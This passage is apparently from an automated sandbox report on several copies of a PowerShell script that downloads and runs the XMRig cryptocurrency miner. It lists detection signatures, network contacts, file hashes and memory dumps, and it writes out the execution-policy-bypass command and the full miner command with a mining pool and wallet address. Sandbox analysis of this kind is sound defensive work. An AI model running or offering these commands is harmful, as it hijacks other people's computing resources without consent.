N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3580-0-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnw23gqd.yyc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3580-9-0x0000026EC3090000-0x0000026EC30B2000-memory.dmp

memory/3580-10-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-11-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-12-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-14-0x0000026EC3110000-0x0000026EC3122000-memory.dmp

memory/3580-15-0x0000026EC3100000-0x0000026EC310A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3900-46-0x00000264C5C80000-0x00000264C5CA0000-memory.dmp

memory/3900-47-0x00000264C7480000-0x00000264C74A0000-memory.dmp

memory/3900-48-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3580-51-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

memory/3900-50-0x00000264C74A0000-0x00000264C74C0000-memory.dmp

memory/3580-49-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3900-52-0x00000264C74C0000-0x00000264C74E0000-memory.dmp

memory/3900-53-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-54-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-56-0x00000264C74A0000-0x00000264C74C0000-memory.dmp

memory/3900-55-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-57-0x00000264C74C0000-0x00000264C74E0000-memory.dmp

memory/3900-58-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-59-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-60-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-61-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-62-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-63-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-64-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-65-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-66-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-67-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-68-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-69-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-70-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-71-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-72-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-73-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-74-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-75-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-76-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-77-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-78-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-79-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-80-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-81-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-82-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-83-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-84-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-85-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-86-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-87-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-88-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-89-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-90-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-91-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-92-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-93-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-94-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-95-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-96-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-97-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-98-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-99-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-100-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-101-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-102-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-103-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-104-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-105-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-106-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-107-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-108-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-109-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-110-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-111-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-112-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-113-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-114-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-115-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-116-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/1280-0-0x00007FF8D81B3000-0x00007FF8D81B5000-memory.dmp

memory/1280-1-0x000001AEF24B0000-0x000001AEF24D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mgwnjfvk.ps5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1280-11-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-12-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-14-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-15-0x000001AEF2860000-0x000001AEF2872000-memory.dmp

memory/1280-16-0x000001AEF2840000-0x000001AEF284A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3156-47-0x000001E958E40000-0x000001E958E60000-memory.dmp

memory/3156-48-0x000001E95A750000-0x000001E95A770000-memory.dmp

memory/3156-49-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-51-0x000001E95A770000-0x000001E95A790000-memory.dmp

memory/3156-50-0x000001E95A790000-0x000001E95A7B0000-memory.dmp

memory/1280-53-0x00007FF8D81B3000-0x00007FF8D81B5000-memory.dmp

memory/3156-52-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/1280-54-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/3156-55-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/1280-56-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/3156-57-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-58-0x000001E95A790000-0x000001E95A7B0000-memory.dmp

memory/3156-59-0x000001E95A770000-0x000001E95A790000-memory.dmp

memory/3156-60-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-61-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-62-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-63-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-64-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-65-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-66-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-67-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-68-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-69-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-70-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-71-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-72-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-73-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-74-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-75-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-76-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-77-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-78-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-79-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-80-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-81-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-82-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-83-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-84-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-85-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-86-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-87-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-88-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-89-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-90-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-91-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-92-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-93-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-94-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-95-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-96-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-97-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-98-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-99-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-100-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-101-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-102-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-103-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-104-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-105-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-106-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-107-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-108-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-109-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-110-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-111-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-112-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-113-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-114-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-115-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-116-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-117-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-118-0x00007FF795950000-0x00007FF796583000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4776-4-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-5-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-6-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-7-0x0000024021010000-0x0000024021032000-memory.dmp

memory/4776-10-0x0000024039650000-0x00000240396C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0mzekqv.lj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4776-25-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-61-0x00000240395E0000-0x00000240395EA000-memory.dmp

memory/4776-48-0x00000240395F0000-0x0000024039602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/224-90-0x00000211D6B30000-0x00000211D6B50000-memory.dmp

memory/224-91-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/4776-93-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/224-92-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/4776-94-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/224-95-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-96-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-97-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-98-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-99-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-100-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-101-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-102-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-103-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-104-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-105-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-106-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-107-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-108-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-109-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-110-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-111-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-112-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-113-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-114-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-115-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-116-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-117-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-118-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-119-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-120-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-121-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-122-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-123-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-124-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-125-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-126-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-127-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-128-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-129-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-130-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-131-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

